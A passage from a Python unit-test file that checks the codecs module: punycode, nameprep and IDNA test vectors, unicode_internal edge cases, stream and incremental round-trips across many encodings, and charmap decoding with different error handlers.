     "\u004F\u004E\u004B\u0045\u0059\u0053",
     b"-with-SUPER-MONKEYS-pc58ag80a8qai00g7n9n"),
    # (N) Hello-Another-Way-<sorezore><no><basho>
    ("\u0048\u0065\u006C\u006C\u006F\u002D\u0041\u006E\u006F"
     "\u0074\u0068\u0065\u0072\u002D\u0057\u0061\u0079\u002D"
     "\u305D\u308C\u305E\u308C\u306E\u5834\u6240",
     b"Hello-Another-Way--fc4qua05auwb3674vfr0b"),
    # (O) <hitotsu><yane><no><shita>2
    ("\u3072\u3068\u3064\u5C4B\u6839\u306E\u4E0B\u0032",
     b"2-u9tlzr9756bt3uc0v"),
    # (P) Maji<de>Koi<suru>5<byou><mae>
    ("\u004D\u0061\u006A\u0069\u3067\u004B\u006F\u0069\u3059"
     "\u308B\u0035\u79D2\u524D",
     b"MajiKoi5-783gue6qz075azm5e"),
    # (Q) <pafii>de<runba>
    ("\u30D1\u30D5\u30A3\u30FC\u0064\u0065\u30EB\u30F3\u30D0",
     b"de-jg4avhby1noc0d"),
    # (R) <sono><supiido><de>
    ("\u305D\u306E\u30B9\u30D4\u30FC\u30C9\u3067",
     b"d9juau41awczczp"),
    # (S) -> $1.00 <-
    ("\u002D\u003E\u0020\u0024\u0031\u002E\u0030\u0030\u0020"
     "\u003C\u002D",
     b"-> $1.00 <--")
]

# Import-time sanity check (leftover debug aid): each entry should be a
# (unicode, punycode) 2-tuple; malformed entries are printed for inspection.
for i in punycode_testcases:
    if len(i)!=2:
        print(repr(i))
@yp_unittest.skip_str_codecs
class PunycodeTest(yp_unittest.TestCase):
    """Round-trip the RFC 3492 sample strings through the punycode codec."""

    def test_encode(self):
        for uni, puny in punycode_testcases:
            # Need to convert both strings to lower case, since
            # some of the extended encodings use upper case, but our
            # code produces only lower case. Converting just puny to
            # lower is also insufficient, since some of the input characters
            # are upper case.
            self.assertEqual(
                str(uni.encode("punycode"), "ascii").lower(),
                str(puny, "ascii").lower()
            )

    def test_decode(self):
        for uni, puny in punycode_testcases:
            self.assertEqual(uni, puny.decode("punycode"))
            # Decoding must also work after an ascii str round-trip.
            puny = puny.decode("ascii").encode("ascii")
            self.assertEqual(uni, puny.decode("punycode"))
@yp_unittest.skip_str_codecs
class UnicodeInternalTest(yp_unittest.TestCase):
    """Tests for the deprecated unicode_internal codec (UCS-4 builds only)."""

    @yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_bug1251300(self):
        # Decoding with unicode_internal used to not correctly handle "code
        # points" above 0x10ffff on UCS-4 builds.
        ok = [
            (b"\x00\x10\xff\xff", "\U0010ffff"),
            (b"\x00\x00\x01\x01", "\U00000101"),
            (b"", ""),
        ]
        not_ok = [
            b"\x7f\xff\xff\xff",
            b"\x80\x00\x00\x00",
            b"\x81\x00\x00\x00",
            b"\x00",
            b"\x00\x00\x00\x00\x00",
        ]
        for internal, uni in ok:
            # Test vectors are big-endian; byte-swap on little-endian hosts.
            if sys.byteorder == "little":
                internal = bytes(reversed(internal))
            with support.check_warnings():
                self.assertEqual(uni, internal.decode("unicode_internal"))
        for internal in not_ok:
            if sys.byteorder == "little":
                internal = bytes(reversed(internal))
            with support.check_warnings(('unicode_internal codec has been '
                                         'deprecated', DeprecationWarning)):
                self.assertRaises(UnicodeDecodeError, internal.decode,
                                  "unicode_internal")
        # A code point just above U+10FFFF must be rejected.
        if sys.byteorder == "little":
            invalid = b"\x00\x00\x11\x00"
        else:
            invalid = b"\x00\x11\x00\x00"
        with support.check_warnings():
            self.assertRaises(UnicodeDecodeError,
                              invalid.decode, "unicode_internal")
        with support.check_warnings():
            self.assertEqual(invalid.decode("unicode_internal", "replace"),
                             '\ufffd')

    @yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_decode_error_attributes(self):
        # The UnicodeDecodeError raised must carry the codec name, the
        # offending object, and the exact start/end offsets.
        try:
            with support.check_warnings(('unicode_internal codec has been '
                                         'deprecated', DeprecationWarning)):
                b"\x00\x00\x00\x00\x00\x11\x11\x00".decode("unicode_internal")
        except UnicodeDecodeError as ex:
            self.assertEqual("unicode_internal", ex.encoding)
            self.assertEqual(b"\x00\x00\x00\x00\x00\x11\x11\x00", ex.object)
            self.assertEqual(4, ex.start)
            self.assertEqual(8, ex.end)
        else:
            self.fail()

    @yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_decode_callback(self):
        # A registered "ignore" error handler must skip the invalid word
        # while still reporting the full consumed length.
        codecs.register_error("UnicodeInternalTest", codecs.ignore_errors)
        decoder = codecs.getdecoder("unicode_internal")
        with support.check_warnings(('unicode_internal codec has been '
                                     'deprecated', DeprecationWarning)):
            ab = "ab".encode("unicode_internal").decode()
            ignored = decoder(bytes("%s\x22\x22\x22\x22%s" % (ab[:4], ab[4:]),
                                    "ascii"),
                              "UnicodeInternalTest")
            self.assertEqual(("ab", 12), ignored)

    def test_encode_length(self):
        with support.check_warnings(('unicode_internal codec has been '
                                     'deprecated', DeprecationWarning)):
            # Issue 3739
            encoder = codecs.getencoder("unicode_internal")
            self.assertEqual(encoder("a")[1], 1)
            self.assertEqual(encoder("\xe9\u0142")[1], 2)
            self.assertEqual(codecs.escape_encode(br'\x00')[1], 4)
# From http://www.gnu.org/software/libidn/draft-josefsson-idn-test-vectors.html
# (input-utf8-bytes, expected-prepped-utf8-bytes) pairs; expected None means
# the input contains prohibited characters and nameprep must raise; a
# (None, None) entry marks a vector skipped by this port.
nameprep_tests = [
    # 3.1 Map to nothing.
    (b'foo\xc2\xad\xcd\x8f\xe1\xa0\x86\xe1\xa0\x8bbar'
     b'\xe2\x80\x8b\xe2\x81\xa0baz\xef\xb8\x80\xef\xb8\x88\xef'
     b'\xb8\x8f\xef\xbb\xbf',
     b'foobarbaz'),
    # 3.2 Case folding ASCII U+0043 U+0041 U+0046 U+0045.
    (b'CAFE',
     b'cafe'),
    # 3.3 Case folding 8bit U+00DF (german sharp s).
    # The original test case is bogus; it says \xc3\xdf
    (b'\xc3\x9f',
     b'ss'),
    # 3.4 Case folding U+0130 (turkish capital I with dot).
    (b'\xc4\xb0',
     b'i\xcc\x87'),
    # 3.5 Case folding multibyte U+0143 U+037A.
    (b'\xc5\x83\xcd\xba',
     b'\xc5\x84 \xce\xb9'),
    # 3.6 Case folding U+2121 U+33C6 U+1D7BB.
    # XXX: skip this as it fails in UCS-2 mode
    #('\xe2\x84\xa1\xe3\x8f\x86\xf0\x9d\x9e\xbb',
    # 'telc\xe2\x88\x95kg\xcf\x83'),
    (None, None),
    # 3.7 Normalization of U+006a U+030c U+00A0 U+00AA.
    (b'j\xcc\x8c\xc2\xa0\xc2\xaa',
     b'\xc7\xb0 a'),
    # 3.8 Case folding U+1FB7 and normalization.
    (b'\xe1\xbe\xb7',
     b'\xe1\xbe\xb6\xce\xb9'),
    # 3.9 Self-reverting case folding U+01F0 and normalization.
    # The original test case is bogus, it says `\xc7\xf0'
    (b'\xc7\xb0',
     b'\xc7\xb0'),
    # 3.10 Self-reverting case folding U+0390 and normalization.
    (b'\xce\x90',
     b'\xce\x90'),
    # 3.11 Self-reverting case folding U+03B0 and normalization.
    (b'\xce\xb0',
     b'\xce\xb0'),
    # 3.12 Self-reverting case folding U+1E96 and normalization.
    (b'\xe1\xba\x96',
     b'\xe1\xba\x96'),
    # 3.13 Self-reverting case folding U+1F56 and normalization.
    (b'\xe1\xbd\x96',
     b'\xe1\xbd\x96'),
    # 3.14 ASCII space character U+0020.
    (b' ',
     b' '),
    # 3.15 Non-ASCII 8bit space character U+00A0.
    (b'\xc2\xa0',
     b' '),
    # 3.16 Non-ASCII multibyte space character U+1680.
    (b'\xe1\x9a\x80',
     None),
    # 3.17 Non-ASCII multibyte space character U+2000.
    (b'\xe2\x80\x80',
     b' '),
    # 3.18 Zero Width Space U+200b.
    (b'\xe2\x80\x8b',
     b''),
    # 3.19 Non-ASCII multibyte space character U+3000.
    (b'\xe3\x80\x80',
     b' '),
    # 3.20 ASCII control characters U+0010 U+007F.
    (b'\x10\x7f',
     b'\x10\x7f'),
    # 3.21 Non-ASCII 8bit control character U+0085.
    (b'\xc2\x85',
     None),
    # 3.22 Non-ASCII multibyte control character U+180E.
    (b'\xe1\xa0\x8e',
     None),
    # 3.23 Zero Width No-Break Space U+FEFF.
    (b'\xef\xbb\xbf',
     b''),
    # 3.24 Non-ASCII control character U+1D175.
    (b'\xf0\x9d\x85\xb5',
     None),
    # 3.25 Plane 0 private use character U+F123.
    (b'\xef\x84\xa3',
     None),
    # 3.26 Plane 15 private use character U+F1234.
    (b'\xf3\xb1\x88\xb4',
     None),
    # 3.27 Plane 16 private use character U+10F234.
    (b'\xf4\x8f\x88\xb4',
     None),
    # 3.28 Non-character code point U+8FFFE.
    (b'\xf2\x8f\xbf\xbe',
     None),
    # 3.29 Non-character code point U+10FFFF.
    (b'\xf4\x8f\xbf\xbf',
     None),
    # 3.30 Surrogate code U+DF42.
    (b'\xed\xbd\x82',
     None),
    # 3.31 Non-plain text character U+FFFD.
    (b'\xef\xbf\xbd',
     None),
    # 3.32 Ideographic description character U+2FF5.
    (b'\xe2\xbf\xb5',
     None),
    # 3.33 Display property character U+0341.
    (b'\xcd\x81',
     b'\xcc\x81'),
    # 3.34 Left-to-right mark U+200E.
    (b'\xe2\x80\x8e',
     None),
    # 3.35 Deprecated U+202A.
    (b'\xe2\x80\xaa',
     None),
    # 3.36 Language tagging character U+E0001.
    (b'\xf3\xa0\x80\x81',
     None),
    # 3.37 Language tagging character U+E0042.
    (b'\xf3\xa0\x81\x82',
     None),
    # 3.38 Bidi: RandALCat character U+05BE and LCat characters.
    (b'foo\xd6\xbebar',
     None),
    # 3.39 Bidi: RandALCat character U+FD50 and LCat characters.
    (b'foo\xef\xb5\x90bar',
     None),
    # 3.40 Bidi: RandALCat character U+FB38 and LCat characters.
    (b'foo\xef\xb9\xb6bar',
     b'foo \xd9\x8ebar'),
    # 3.41 Bidi: RandALCat without trailing RandALCat U+0627 U+0031.
    (b'\xd8\xa71',
     None),
    # 3.42 Bidi: RandALCat character U+0627 U+0031 U+0628.
    (b'\xd8\xa71\xd8\xa8',
     b'\xd8\xa71\xd8\xa8'),
    # 3.43 Unassigned code point U+E0002.
    # Skip this test as we allow unassigned
    #(b'\xf3\xa0\x80\x82',
    # None),
    (None, None),
    # 3.44 Larger test (shrinking).
    # Original test case reads \xc3\xdf
    (b'X\xc2\xad\xc3\x9f\xc4\xb0\xe2\x84\xa1j\xcc\x8c\xc2\xa0\xc2'
     b'\xaa\xce\xb0\xe2\x80\x80',
     b'xssi\xcc\x87tel\xc7\xb0 a\xce\xb0 '),
    # 3.45 Larger test (expanding).
    # Original test case reads \xc3\x9f
    (b'X\xc3\x9f\xe3\x8c\x96\xc4\xb0\xe2\x84\xa1\xe2\x92\x9f\xe3\x8c'
     b'\x80',
     b'xss\xe3\x82\xad\xe3\x83\xad\xe3\x83\xa1\xe3\x83\xbc\xe3'
     b'\x83\x88\xe3\x83\xabi\xcc\x87tel\x28d\x29\xe3\x82'
     b'\xa2\xe3\x83\x91\xe3\x83\xbc\xe3\x83\x88')
]
@yp_unittest.skip_str_codecs
class NameprepTest(yp_unittest.TestCase):
    """Run the libidn nameprep test vectors through encodings.idna.nameprep."""

    def test_nameprep(self):
        from encodings.idna import nameprep
        for pos, (orig, prepped) in enumerate(nameprep_tests):
            if orig is None:
                # Skipped
                continue
            # The Unicode strings are given in UTF-8
            orig = str(orig, "utf-8", "surrogatepass")
            if prepped is None:
                # Input contains prohibited characters
                self.assertRaises(UnicodeError, nameprep, orig)
            else:
                prepped = str(prepped, "utf-8", "surrogatepass")
                try:
                    self.assertEqual(nameprep(orig), prepped)
                except Exception as e:
                    # Re-raise with the libidn vector number for diagnosis.
                    raise support.TestFailed("Test 3.%d: %s" % (pos+1, str(e)))
@yp_unittest.skip_str_codecs
class IDNACodecTest(yp_unittest.TestCase):
    """Tests for the idna codec: whole-string, stream, and incremental APIs."""

    def test_builtin_decode(self):
        self.assertEqual(str(b"python.org", "idna"), "python.org")
        self.assertEqual(str(b"python.org.", "idna"), "python.org.")
        self.assertEqual(str(b"xn--pythn-mua.org", "idna"), "pyth\xf6n.org")
        self.assertEqual(str(b"xn--pythn-mua.org.", "idna"), "pyth\xf6n.org.")

    def test_builtin_encode(self):
        self.assertEqual("python.org".encode("idna"), b"python.org")
        self.assertEqual("python.org.".encode("idna"), b"python.org.")
        self.assertEqual("pyth\xf6n.org".encode("idna"), b"xn--pythn-mua.org")
        self.assertEqual("pyth\xf6n.org.".encode("idna"), b"xn--pythn-mua.org.")

    def test_stream(self):
        # Reading past the end of an idna stream must return "".
        r = codecs.getreader("idna")(io.BytesIO(b"abc"))
        r.read(3)
        self.assertEqual(r.read(), "")

    def test_incremental_decode(self):
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"python.org"), "idna")),
            "python.org"
        )
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"python.org."), "idna")),
            "python.org."
        )
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
            "pyth\xf6n.org."
        )
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
            "pyth\xf6n.org."
        )
        # Labels are buffered until a "." (or final=True) completes them.
        decoder = codecs.getincrementaldecoder("idna")()
        self.assertEqual(decoder.decode(b"xn--xam", ), "")
        self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
        self.assertEqual(decoder.decode(b"rg"), "")
        self.assertEqual(decoder.decode(b"", True), "org")
        decoder.reset()
        self.assertEqual(decoder.decode(b"xn--xam", ), "")
        self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
        self.assertEqual(decoder.decode(b"rg."), "org.")
        self.assertEqual(decoder.decode(b"", True), "")

    def test_incremental_encode(self):
        self.assertEqual(
            b"".join(codecs.iterencode("python.org", "idna")),
            b"python.org"
        )
        self.assertEqual(
            b"".join(codecs.iterencode("python.org.", "idna")),
            b"python.org."
        )
        self.assertEqual(
            b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
            b"xn--pythn-mua.org."
        )
        self.assertEqual(
            b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
            b"xn--pythn-mua.org."
        )
        # As with decoding, partial labels are held back until completed.
        encoder = codecs.getincrementalencoder("idna")()
        self.assertEqual(encoder.encode("\xe4x"), b"")
        self.assertEqual(encoder.encode("ample.org"), b"xn--xample-9ta.")
        self.assertEqual(encoder.encode("", True), b"org")
        encoder.reset()
        self.assertEqual(encoder.encode("\xe4x"), b"")
        self.assertEqual(encoder.encode("ample.org."), b"xn--xample-9ta.org.")
        self.assertEqual(encoder.encode("", True), b"")
@yp_unittest.skip_str_codecs
class CodecsModuleTest(yp_unittest.TestCase):
    """Argument/error handling of the top-level codecs module functions."""

    def test_decode(self):
        self.assertEqual(codecs.decode(b'\xe4\xf6\xfc', 'latin-1'),
                         '\xe4\xf6\xfc')
        self.assertRaises(TypeError, codecs.decode)
        self.assertEqual(codecs.decode(b'abc'), 'abc')
        self.assertRaises(UnicodeDecodeError, codecs.decode, b'\xff', 'ascii')

    def test_encode(self):
        self.assertEqual(codecs.encode('\xe4\xf6\xfc', 'latin-1'),
                         b'\xe4\xf6\xfc')
        self.assertRaises(TypeError, codecs.encode)
        self.assertRaises(LookupError, codecs.encode, "foo", "__spam__")
        self.assertEqual(codecs.encode('abc'), b'abc')
        self.assertRaises(UnicodeEncodeError, codecs.encode, '\xffff', 'ascii')

    def test_register(self):
        self.assertRaises(TypeError, codecs.register)
        self.assertRaises(TypeError, codecs.register, 42)

    def test_lookup(self):
        self.assertRaises(TypeError, codecs.lookup)
        self.assertRaises(LookupError, codecs.lookup, "__spam__")
        self.assertRaises(LookupError, codecs.lookup, " ")

    def test_getencoder(self):
        self.assertRaises(TypeError, codecs.getencoder)
        self.assertRaises(LookupError, codecs.getencoder, "__spam__")

    def test_getdecoder(self):
        self.assertRaises(TypeError, codecs.getdecoder)
        self.assertRaises(LookupError, codecs.getdecoder, "__spam__")

    def test_getreader(self):
        self.assertRaises(TypeError, codecs.getreader)
        self.assertRaises(LookupError, codecs.getreader, "__spam__")

    def test_getwriter(self):
        self.assertRaises(TypeError, codecs.getwriter)
        self.assertRaises(LookupError, codecs.getwriter, "__spam__")

    def test_lookup_issue1813(self):
        # Issue #1813: under Turkish locales, lookup of some codecs failed
        # because 'I' is lowercased as "ı" (dotless i)
        oldlocale = locale.setlocale(locale.LC_CTYPE)
        self.addCleanup(locale.setlocale, locale.LC_CTYPE, oldlocale)
        try:
            locale.setlocale(locale.LC_CTYPE, 'tr_TR')
        except locale.Error:
            # Unsupported locale on this system
            self.skipTest('test needs Turkish locale')
        c = codecs.lookup('ASCII')
        self.assertEqual(c.name, 'ascii')
@yp_unittest.skip_str_codecs
class StreamReaderTest(yp_unittest.TestCase):
    """Exercise StreamReader.readlines() on multibyte UTF-8 input."""

    def setUp(self):
        # Two UTF-8 encoded Hangul syllables separated by a newline.
        self.reader = codecs.getreader('utf-8')
        self.stream = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')

    def test_readlines(self):
        lines = self.reader(self.stream).readlines()
        self.assertEqual(lines, ['\ud55c\n', '\uae00'])
@yp_unittest.skip_str_codecs
class EncodedFileTest(yp_unittest.TestCase):
    """Transcoding behavior of codecs.EncodedFile wrappers."""

    def test_basic(self):
        # Reading transcodes from the file encoding (utf-8) to utf-16-le.
        source = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
        wrapped = codecs.EncodedFile(source, 'utf-16-le', 'utf-8')
        self.assertEqual(wrapped.read(), b'\\\xd5\n\x00\x00\xae')
        # Writing transcodes from utf-8 input to the file encoding (latin-1).
        sink = io.BytesIO()
        wrapped = codecs.EncodedFile(sink, 'utf-8', 'latin-1')
        wrapped.write(b'\xc3\xbc')
        self.assertEqual(sink.getvalue(), b'\xfc')
# Every codec exercised by the generic round-trip tests below.
all_unicode_encodings = [
    "ascii",
    "big5",
    "big5hkscs",
    "charmap",
    "cp037",
    "cp1006",
    "cp1026",
    "cp1125",
    "cp1140",
    "cp1250",
    "cp1251",
    "cp1252",
    "cp1253",
    "cp1254",
    "cp1255",
    "cp1256",
    "cp1257",
    "cp1258",
    "cp424",
    "cp437",
    "cp500",
    "cp720",
    "cp737",
    "cp775",
    "cp850",
    "cp852",
    "cp855",
    "cp856",
    "cp857",
    "cp858",
    "cp860",
    "cp861",
    "cp862",
    "cp863",
    "cp864",
    "cp865",
    "cp866",
    "cp869",
    "cp874",
    "cp875",
    "cp932",
    "cp949",
    "cp950",
    "euc_jis_2004",
    "euc_jisx0213",
    "euc_jp",
    "euc_kr",
    "gb18030",
    "gb2312",
    "gbk",
    "hp_roman8",
    "hz",
    "idna",
    "iso2022_jp",
    "iso2022_jp_1",
    "iso2022_jp_2",
    "iso2022_jp_2004",
    "iso2022_jp_3",
    "iso2022_jp_ext",
    "iso2022_kr",
    "iso8859_1",
    "iso8859_10",
    "iso8859_11",
    "iso8859_13",
    "iso8859_14",
    "iso8859_15",
    "iso8859_16",
    "iso8859_2",
    "iso8859_3",
    "iso8859_4",
    "iso8859_5",
    "iso8859_6",
    "iso8859_7",
    "iso8859_8",
    "iso8859_9",
    "johab",
    "koi8_r",
    "koi8_u",
    "latin_1",
    "mac_cyrillic",
    "mac_greek",
    "mac_iceland",
    "mac_latin2",
    "mac_roman",
    "mac_turkish",
    "palmos",
    "ptcp154",
    "punycode",
    "raw_unicode_escape",
    "shift_jis",
    "shift_jis_2004",
    "shift_jisx0213",
    "tis_620",
    "unicode_escape",
    "unicode_internal",
    "utf_16",
    "utf_16_be",
    "utf_16_le",
    "utf_7",
    "utf_8",
]

# mbcs is Windows-only; include it only where the codec exists.
if hasattr(codecs, "mbcs_encode"):
    all_unicode_encodings.append("mbcs")

# The following encoding is not tested, because it's not supposed
# to work:
#    "undefined"

# The following encodings don't work in stateful mode
broken_unicode_with_streams = [
    "punycode",
    "unicode_internal"
]
# ...and these additionally lack usable incremental coders.
broken_incremental_coders = broken_unicode_with_streams + [
    "idna",
]
@yp_unittest.skip_str_codecs
class BasicUnicodeTest(yp_unittest.TestCase, MixInCheckStateHandling):
    """Generic round-trip tests applied to every codec in all_unicode_encodings."""

    def test_basics(self):
        s = "abc123"  # all codecs should be able to encode these
        for encoding in all_unicode_encodings:
            name = codecs.lookup(encoding).name
            if encoding.endswith("_codec"):
                name += "_codec"
            elif encoding == "latin_1":
                name = "latin_1"
            self.assertEqual(encoding.replace("_", "-"), name.replace("_", "-"))
            with support.check_warnings():
                # unicode-internal has been deprecated
                (b, size) = codecs.getencoder(encoding)(s)
                self.assertEqual(size, len(s), "encoding=%r" % encoding)
                (chars, size) = codecs.getdecoder(encoding)(b)
                self.assertEqual(chars, s, "encoding=%r" % encoding)
            if encoding not in broken_unicode_with_streams:
                # check stream reader/writer
                q = Queue(b"")
                writer = codecs.getwriter(encoding)(q)
                encodedresult = b""
                for c in s:
                    writer.write(c)
                    chunk = q.read()
                    self.assertTrue(type(chunk) is bytes, type(chunk))
                    encodedresult += chunk
                q = Queue(b"")
                reader = codecs.getreader(encoding)(q)
                decodedresult = ""
                for c in encodedresult:
                    q.write(bytes([c]))
                    decodedresult += reader.read()
                self.assertEqual(decodedresult, s, "encoding=%r" % encoding)
            if encoding not in broken_incremental_coders:
                # check incremental decoder/encoder and iterencode()/iterdecode()
                try:
                    encoder = codecs.getincrementalencoder(encoding)()
                except LookupError:  # no IncrementalEncoder
                    pass
                else:
                    # check incremental decoder/encoder
                    encodedresult = b""
                    for c in s:
                        encodedresult += encoder.encode(c)
                    encodedresult += encoder.encode("", True)
                    decoder = codecs.getincrementaldecoder(encoding)()
                    decodedresult = ""
                    for c in encodedresult:
                        decodedresult += decoder.decode(bytes([c]))
                    decodedresult += decoder.decode(b"", True)
                    self.assertEqual(decodedresult, s,
                                     "encoding=%r" % encoding)
                    # check iterencode()/iterdecode()
                    result = "".join(codecs.iterdecode(
                        codecs.iterencode(s, encoding), encoding))
                    self.assertEqual(result, s, "encoding=%r" % encoding)
                    # check iterencode()/iterdecode() with empty string
                    result = "".join(codecs.iterdecode(
                        codecs.iterencode("", encoding), encoding))
                    self.assertEqual(result, "")
                if encoding not in ("idna", "mbcs"):
                    # check incremental decoder/encoder with errors argument
                    try:
                        encoder = codecs.getincrementalencoder(encoding)("ignore")
                    except LookupError:  # no IncrementalEncoder
                        pass
                    else:
                        encodedresult = b"".join(encoder.encode(c) for c in s)
                        decoder = codecs.getincrementaldecoder(encoding)("ignore")
                        decodedresult = "".join(decoder.decode(bytes([c]))
                                                for c in encodedresult)
                        self.assertEqual(decodedresult, s,
                                         "encoding=%r" % encoding)

    @support.cpython_only
    def test_basics_capi(self):
        from _testcapi import codec_incrementalencoder, codec_incrementaldecoder
        s = "abc123"  # all codecs should be able to encode these
        for encoding in all_unicode_encodings:
            if encoding not in broken_incremental_coders:
                # check incremental decoder/encoder (fetched via the C API)
                try:
                    cencoder = codec_incrementalencoder(encoding)
                except LookupError:  # no IncrementalEncoder
                    pass
                else:
                    # check C API
                    encodedresult = b""
                    for c in s:
                        encodedresult += cencoder.encode(c)
                    encodedresult += cencoder.encode("", True)
                    cdecoder = codec_incrementaldecoder(encoding)
                    decodedresult = ""
                    for c in encodedresult:
                        decodedresult += cdecoder.decode(bytes([c]))
                    decodedresult += cdecoder.decode(b"", True)
                    self.assertEqual(decodedresult, s,
                                     "encoding=%r" % encoding)
                if encoding not in ("idna", "mbcs"):
                    # check incremental decoder/encoder with errors argument
                    try:
                        cencoder = codec_incrementalencoder(encoding, "ignore")
                    except LookupError:  # no IncrementalEncoder
                        pass
                    else:
                        encodedresult = b"".join(cencoder.encode(c) for c in s)
                        cdecoder = codec_incrementaldecoder(encoding, "ignore")
                        decodedresult = "".join(cdecoder.decode(bytes([c]))
                                                for c in encodedresult)
                        self.assertEqual(decodedresult, s,
                                         "encoding=%r" % encoding)

    def test_seek(self):
        # all codecs should be able to encode these
        s = "%s\n%s\n" % (100*"abc123", 100*"def456")
        for encoding in all_unicode_encodings:
            if encoding == "idna":  # FIXME: See SF bug #1163178
                continue
            if encoding in broken_unicode_with_streams:
                continue
            reader = codecs.getreader(encoding)(io.BytesIO(s.encode(encoding)))
            for t in range(5):
                # Test that calling seek resets the internal codec state and buffers
                reader.seek(0, 0)
                data = reader.read()
                self.assertEqual(s, data)

    def test_bad_decode_args(self):
        for encoding in all_unicode_encodings:
            decoder = codecs.getdecoder(encoding)
            self.assertRaises(TypeError, decoder)
            if encoding not in ("idna", "punycode"):
                self.assertRaises(TypeError, decoder, 42)

    def test_bad_encode_args(self):
        for encoding in all_unicode_encodings:
            encoder = codecs.getencoder(encoding)
            with support.check_warnings():
                # unicode-internal has been deprecated
                self.assertRaises(TypeError, encoder)

    def test_encoding_map_type_initialized(self):
        from encodings import cp1140
        # This used to crash, we are only verifying there's no crash.
        table_type = type(cp1140.encoding_table)
        self.assertEqual(table_type, table_type)

    def test_decoder_state(self):
        # Check that getstate() and setstate() handle the state properly
        u = "abc123"
        for encoding in all_unicode_encodings:
            if encoding not in broken_incremental_coders:
                self.check_state_handling_decode(encoding, u, u.encode(encoding))
                self.check_state_handling_encode(encoding, u, u.encode(encoding))
@yp_unittest.skip_str_codecs
class CharmapTest(yp_unittest.TestCase):
    """codecs.charmap_decode with the three mapping forms: str, int->str dict,
    and int->int dict — including error-handler behavior for unmapped bytes."""

    def test_decode_with_string_map(self):
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict", "abc"),
            ("abc", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict", "\U0010FFFFbc"),
            ("\U0010FFFFbc", 3)
        )
        # A byte beyond the map, or mapped to U+FFFE, is an error in strict mode.
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab"
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab\ufffe"
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab"),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab\ufffe"),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab"),
            ("ab", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab\ufffe"),
            ("ab", 3)
        )
        allbytes = bytes(range(256))
        self.assertEqual(
            codecs.charmap_decode(allbytes, "ignore", ""),
            ("", len(allbytes))
        )

    def test_decode_with_int2str_map(self):
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 'a', 1: 'b', 2: 'c'}),
            ("abc", 3)
        )
        # Multi-character replacement strings are allowed.
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 'Aa', 1: 'Bb', 2: 'Cc'}),
            ("AaBbCc", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: '\U0010FFFF', 1: 'b', 2: 'c'}),
            ("\U0010FFFFbc", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 'a', 1: 'b', 2: ''}),
            ("ab", 3)
        )
        # Missing key, None value, or U+FFFE all count as unmapped.
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
            {0: 'a', 1: 'b'}
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
            {0: 'a', 1: 'b', 2: None}
        )
        # Issue #14850
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
            {0: 'a', 1: 'b', 2: '\ufffe'}
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: 'a', 1: 'b'}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: 'a', 1: 'b', 2: None}),
            ("ab\ufffd", 3)
        )
        # Issue #14850
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: 'a', 1: 'b', 2: '\ufffe'}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: 'a', 1: 'b'}),
            ("ab", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: 'a', 1: 'b', 2: None}),
            ("ab", 3)
        )
        # Issue #14850
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: 'a', 1: 'b', 2: '\ufffe'}),
            ("ab", 3)
        )
        allbytes = bytes(range(256))
        self.assertEqual(
            codecs.charmap_decode(allbytes, "ignore", {}),
            ("", len(allbytes))
        )

    def test_decode_with_int2int_map(self):
        a = ord('a')
        b = ord('b')
        c = ord('c')
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: a, 1: b, 2: c}),
            ("abc", 3)
        )
        # Issue #15379
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 0x10FFFF, 1: b, 2: c}),
            ("\U0010FFFFbc", 3)
        )
        self.assertEqual(
